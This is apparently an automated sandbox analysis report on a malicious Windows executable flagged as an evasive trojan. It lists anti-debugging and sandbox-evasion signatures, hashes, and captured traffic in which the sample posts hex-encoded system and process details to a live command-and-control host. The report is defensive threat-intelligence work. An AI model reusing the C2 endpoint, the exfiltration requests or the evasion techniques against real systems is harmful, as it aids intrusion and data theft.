Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iuO4kwUi17.exe

Overview

General Information

Sample name:iuO4kwUi17.exe
renamed because original name is a hash value
Original sample name:a7e8135cfe118aa459fe0483617fd64e.exe
Analysis ID:1578958
MD5:a7e8135cfe118aa459fe0483617fd64e
SHA1:03509b6b6a9e158bc7a6ae89f21f0057e5115ecd
SHA256:97f25927cea71bfcdac5e7755682aea36429ea3eb3accfc64ecdfc9db1d8006b
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • iuO4kwUi17.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\iuO4kwUi17.exe" MD5: A7E8135CFE118AA459FE0483617FD64E)
    • WerFault.exe (PID: 3888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: iuO4kwUi17.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: iuO4kwUi17.exeReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: iuO4kwUi17.exeJoe Sandbox ML: detected
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_48a37bd7-9
Source: iuO4kwUi17.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443893Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443893Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443893Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443893Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp, iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

System Summary

barindex
PE file contains section with special chars
Source: iuO4kwUi17.exeStatic PE information: section name:
Source: iuO4kwUi17.exeStatic PE information: section name: .idata
Source: iuO4kwUi17.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
Source: iuO4kwUi17.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: iuO4kwUi17.exeStatic PE information: Section: lvvpaogd ZLIB complexity 0.994559543444694
Source: iuO4kwUi17.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
Source: C:\Users\user\Desktop\iuO4kwUi17.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\19a312e5-6cbf-4b76-89ef-d1ab7c8c5f31Jump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: iuO4kwUi17.exeReversingLabs: Detection: 47%
Source: iuO4kwUi17.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\iuO4kwUi17.exe "C:\Users\user\Desktop\iuO4kwUi17.exe"
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: windows.storage.dllJump to behavior
